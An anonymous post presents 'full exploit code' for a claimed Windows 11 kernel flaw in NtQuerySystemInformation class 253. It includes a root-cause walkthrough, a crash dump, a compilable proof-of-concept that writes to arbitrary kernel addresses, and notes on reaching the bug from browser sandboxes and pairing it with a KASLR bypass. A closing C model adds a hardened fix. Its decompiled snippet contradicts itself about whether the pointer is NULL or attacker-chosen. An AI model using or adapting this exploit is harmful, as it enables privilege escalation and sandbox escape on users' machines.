Full exploit code for CVE-2026-40369

Anonymous, posted 1 hour ago
Vulnerability exploitation
Summary
  • Type: arbitrary kernel write (increment), a privilege-escalation primitive
  • Component: ntoskrnl.exe, ExpGetProcessInformation
  • Trigger: NtQuerySystemInformation(SystemProcessInformationExtension, kernelAddr, 0, &needed)
  • Impact: any unprivileged process can increment values at arbitrary kernel addresses (write primitive).
  • Reachable from the Chrome sandbox: yes (NtQuerySystemInformation is not blocked)
  • Windows versions: Windows 11 24H2-25H2
  • Exploit reliability: 100% deterministic
  • KASLR bypass: can be combined with the prefetch tool (https://github.com/exploits-forsale/prefetch-tool).
Root cause
ExpGetProcessInformation is called from ExpQuerySystemInformation for information classes 5 (SystemProcessInformation), 0x39, 0x94, 0xFC and 0xFD (253 = SystemProcessInformationExtension).
Call site, ExpQuerySystemInformation+0xD7A:
// Cases 5, 0x39, 0x94, 0xFC, 0xFD all share this call:
result = ExpGetProcessInformation((unsigned int *)userBuffer, bufferLength, &returnSize, NULL, infoClass);


When userBuffer points into the kernel (for example, when the caller is only probing for the required buffer size), the function takes this path:
// ExpGetProcessInformation, simplified:
__int64 ExpGetProcessInformation(unsigned int *buffer, unsigned int length, ..., int infoClass)
{
    v91 = buffer; // = NULL

    if (infoClass == 252) {
        v86 = v91; // class 252 uses v86
        // ...
    } else {
        v86 = NULL;
        if (infoClass == 253) {
            v95 = v91; // v95 = NULL (BUG: sanitization for kernel address check!)
            goto LABEL_11;
        }
        // class 5 path - uses v81, doesn't touch v95
    }
    v95 = NULL; // class 252 path falls through here

LABEL_11:
    // ... process iteration loop ...
    while (NextProcess) {
        if (infoClass == 253) {
            ++*v95; // CRASH: v95 is Arbitrary Kernel Address
            v95[1] += ...; // Would also crash
            v95[2] += ...; // Would also crash
        }
        // class 5/252 paths handle NULL buffer correctly
    }
}

For class 253, v95 is set to the buffer pointer (v91 = buffer = NULL) without any NULL check. The process iteration loop then tries to increment the counter at *v95, which causes a kernel-mode NULL pointer dereference → blue screen (BSOD).
Classes 5 and 252 handle a NULL buffer correctly because they use different variables (v81 / v86) and check them properly before dereferencing.
Crash details
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff800041424344, memory referenced.
Arg2: 0000000000000002, X64: bit 0 set if the fault was due to a not-present PTE.
  bit 1 is set if the fault was due to a write, clear if a read.
  bit 3 is set if the processor decided the fault was due to a corrupted PTE.
  bit 4 is set if the fault was due to attempted execute of a no-execute PTE.
  - ARM64: bit 1 is set if the fault was due to a write, clear if a read.
  bit 3 is set if the fault was due to attempted execute of a no-execute PTE.
Arg3: fffff803a06db22e, If non-zero, the instruction address which referenced the bad memory
  address.
Arg4: 0000000000000002, (reserved)

IP_IN_PAGED_CODE:
nt!ExpGetProcessInformation+42e
fffff803`a06db22e ff03 inc dword ptr [rbx]

STACK_TEXT:
*** WARNING: Unable to verify checksum for poc.exe
Unable to load image C:\Users\vm\poc.exe, Win32 error 0n2
ffffd380`d4dc52f8 fffff803`a01b2d82 : ffffd380`d4dc5378 00000000`00000001 00000000`00000100 fffff803`a02c4801 : nt!DbgBreakPointWithStatus
ffffd380`d4dc5300 fffff803`a01b22ac : 00000000`00000003 ffffd380`d4dc5460 fffff803`a02c4970 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
ffffd380`d4dc5360 fffff803`a00fba97 : 00000000`00000000 fffff803`9fe46273 00000000`00000000 00000000`00000000 : nt!KeBugCheck2+0xb2c
ffffd380`d4dc5af0 fffff803`9fe29dc0 : 00000000`00000050 ffff8000`41424344 00000000`00000002 ffffd380`d4dc5d90 : nt!KeBugCheckEx+0x107
ffffd380`d4dc5b30 fffff803`9fe16d96 : fffff803`a0bd9680 ffff8000`00000000 ffff8000`41424344 0000007f`fffffff8 : nt!MiSystemFault+0x850
ffffd380`d4dc5c20 fffff803`a02b9ecb : 00000000`00000000 00000000`0000000f 00000000`00000000 0000000c`00000000 : nt!MmAccessFault+0x646
ffffd380`d4dc5d90 fffff803`a06db22e : 00000000`00000001 00000000`00000001 00000000`c0000004 00000000`000000fd : nt!KiPageFault+0x38b
ffffd380`d4dc5f20 fffff803`a06dcfbf : 00000000`00000000 00000000`00000000 ffff8701`f54e4118 00000000`00000000 : nt!ExpGetProcessInformation+0x42e
ffffd380`d4dc6540 fffff803`a06e1061 : 00000000`00001000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ExpQuerySystemInformation+0xd7f
ffffd380`d4dc6aa0 fffff803`a02be355 : 00000285`00b20000 ffff8701`f54e4080 ffff8701`f54e4080 00000000`00000000 : nt!NtQuerySystemInformation+0x91
ffffd380`d4dc6ae0 00007ffd`5bc82154 : 00007ff6`f01c10ef 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 : nt!KiSystemServiceCopyEnd+0x25
000000e8`7679faf8 00007ff6`f01c10ef : 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 00000285`00da4eb5 : ntdll!NtQuerySystemInformation+0x14
000000e8`7679fb00 00007ff6`f01c1374 : 00000000`00000000 00000285`00da3ab0 00000000`00000000 00000000`00000000 : poc+0x10ef
000000e8`7679fb30 00007ffd`5a5ae8d7 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc+0x1374
000000e8`7679fb70 00007ffd`5bbac48c : 00000000`00000000 00000000`00000000 000004f0`fffffb30 000004d0`fffffb30 : KERNEL32!BaseThreadInitThunk+0x17
000000e8`7679fba0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2c

Minimal reproduction (unprivileged user, no special token required):
/**
* poc.c — NtQuerySystemInformation class 253 arbitrary kernel increment PoC
*
* Demonstrates arbitrary kernel DWORD increment via ProbeForWrite bypass.
* Passes a kernel address as the output buffer with Length=0, causing
* ExpGetProcessInformation to increment DWORDs at the target address
* without validation.
*
* Build: cl /W4 /O2 poc.c /Fe:poc.exe /link ntdll.lib
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ntdll.lib")

typedef long NTSTATUS;

#define SystemProcessInformationExtension 253

typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

int main(void)
{
    /* Resolve the native syscall stub directly from ntdll. */
    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!pNtQSI) {
        printf("[-] Failed to resolve NtQuerySystemInformation\n");
        return 1;
    }

    /* Unmapped kernel address used in the crash dump above; triggers a bugcheck. */
    PVOID target = (PVOID)0xffff800041424344ULL;

    printf("[*] NtQuerySystemInformation class 253 arbitrary kernel increment PoC\n");
    printf("[*] Target kernel address: %p\n", target);
    printf("[*] Will write:\n");
    printf(" [target+0] += num_processes (DWORD increment)\n");
    printf(" [target+4] += total_threads (DWORD add)\n");
    printf(" [target+8] += total_handles (DWORD add)\n");
    printf("\n");
    printf("[!] This WILL bugcheck if the address is not mapped writable memory.\n");
    printf("[*] Press Enter to trigger...\n");
    getchar();

    ULONG needed = 0;
    NTSTATUS status = pNtQSI(
        SystemProcessInformationExtension,
        target, /* kernel address — ProbeForWrite skipped because Length=0 */
        0, /* Length=0 bypasses ProbeForWrite entirely */
        &needed
    );

    printf("[*] NtQuerySystemInformation returned: 0x%08lX\n", status);
    printf("[*] Required length: %lu\n", needed);
    printf("[+] Done. If you see this, the writes succeeded without bugcheck.\n");

    return 0;
}

Exploitability assessment: arbitrary kernel write
  • ProbeForWrite bypass
ExpQuerySystemInformation calls ProbeForWrite(buffer, Length, alignment) before dispatching. With Length = 0, ProbeForWrite is a complete no-op: its entire body is guarded by if (Length).
Therefore NtQuerySystemInformation(253, arbitraryKernelAddr, 0, &needed) passes an unvalidated kernel pointer into ExpGetProcessInformation.
Write primitive
For every process on the system the function does the following:
v95 = userBuffer; // attacker-controlled pointer, NOT validated for class 253 with Length=0

// For EACH process:
++*v95; // *(uint32*)(addr+0) += 1
v95[1] += threadCnt; // *(uint32*)(addr+4) += process_active_thread_count
v95[2] += handleCnt; // *(uint32*)(addr+8) += process_handle_count
From this it follows that:
  • addr+0: incremented by 1 per process → total = number of processes on the system
  • addr+4: sum of the thread counts of all processes
  • addr+8: sum of the handle counts of all processes
The writes still happen even though Length = 0.
ExpGetProcessInformation checks if (length < 12) and sets STATUS_INFO_LENGTH_MISMATCH, but it does not return early. It stores the error status, continues into the process iteration loop, performs the writes through v95 for every process, and only then returns the error status.
Usable from the Chrome, Edge and Firefox sandboxes.
Fully reachable:
  • NtQuerySystemInformation is not blocked by the win32k lockdown mitigation
  • A restricted token does not block this system call
  • Untrusted integrity level does not block this system call
Project address:
https://github.com/orinimron123/CVE-2026-40369-EXPLOIT
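The two halves of the primitive described above, the Length = 0 no-op in ProbeForWrite and the class-253 loop that keeps writing after its length check fails, modelled in C as an added example (a simplified reconstruction from the description, not Microsoft's code or the linked project's). The process list is constructed sample data, MM_USER_PROBE_ADDRESS is the documented x64 user-space limit, and class253_hardened is one possible early-return fix, not the vendor's patch:

```c
#include <stddef.h>
#include <stdint.h>
typedef long NTSTATUS;                                    /* real NTSTATUS values */
#define STATUS_SUCCESS              ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define MM_USER_PROBE_ADDRESS       0x00007FFFFFFF0000ULL   /* x64 user-space limit */
typedef struct { uint32_t threads; uint32_t handles; } proc_t;
/* Constructed sample process list: 3 processes, 15 threads, 400 handles. */
static const proc_t sample_procs[] = { {4, 100}, {10, 250}, {1, 50} };

/* ProbeForWrite model: the real body sits under if (Length), so Length == 0 accepts any address. */
static int probe_for_write_accepts(uint64_t addr, uint32_t length)
{
    if (length == 0) return 1;                            /* no-op: the bypass */
    return addr < MM_USER_PROBE_ADDRESS && length <= MM_USER_PROBE_ADDRESS - addr;
}
/* Class-253 loop with the flaw: a short buffer only sets the status, then
 * the loop still adds three DWORDs through v95 for every process. */
static NTSTATUS class253_vulnerable(uint32_t *v95, uint32_t length,
                                    const proc_t *p, size_t n)
{
    NTSTATUS status = STATUS_SUCCESS;
    if (length < 12) status = STATUS_INFO_LENGTH_MISMATCH; /* recorded, no return */
    for (size_t i = 0; i < n; i++) {
        ++v95[0];                 /* [addr+0] += 1 per process       */
        v95[1] += p[i].threads;   /* [addr+4] += active thread count */
        v95[2] += p[i].handles;   /* [addr+8] += handle count        */
    }
    return status;
}

/* One possible hardening (not the vendor's patch): fail before the loop,
 * so a short or NULL buffer is never written through. */
static NTSTATUS class253_hardened(uint32_t *v95, uint32_t length, const proc_t *p, size_t n)
{
    if (v95 == NULL || length < 12) return STATUS_INFO_LENGTH_MISMATCH;
    return class253_vulnerable(v95, length, p, n);        /* safe once checked */
}
/* Runs one variant with the given Length against a zeroed 12-byte target t. */
static NTSTATUS run_class253(int hardened, uint32_t length, uint32_t t[3])
{
    size_t n = sizeof sample_procs / sizeof sample_procs[0];
    t[0] = t[1] = t[2] = 0;
    return hardened ? class253_hardened(t, length, sample_procs, n)
                    : class253_vulnerable(t, length, sample_procs, n);
}
/* Accessors: the returned status, and DWORD dword (0..2) of the target, after one run. */
static NTSTATUS run_status(int h, uint32_t len) { uint32_t t[3]; return run_class253(h, len, t); }
static uint32_t run_target(int h, uint32_t len, int dword) { uint32_t t[3]; run_class253(h, len, t); return t[dword]; }
```

With Length = 0 the vulnerable path returns STATUS_INFO_LENGTH_MISMATCH yet leaves the target holding {3, 15, 400}, while the hardened path returns the same status with the target untouched.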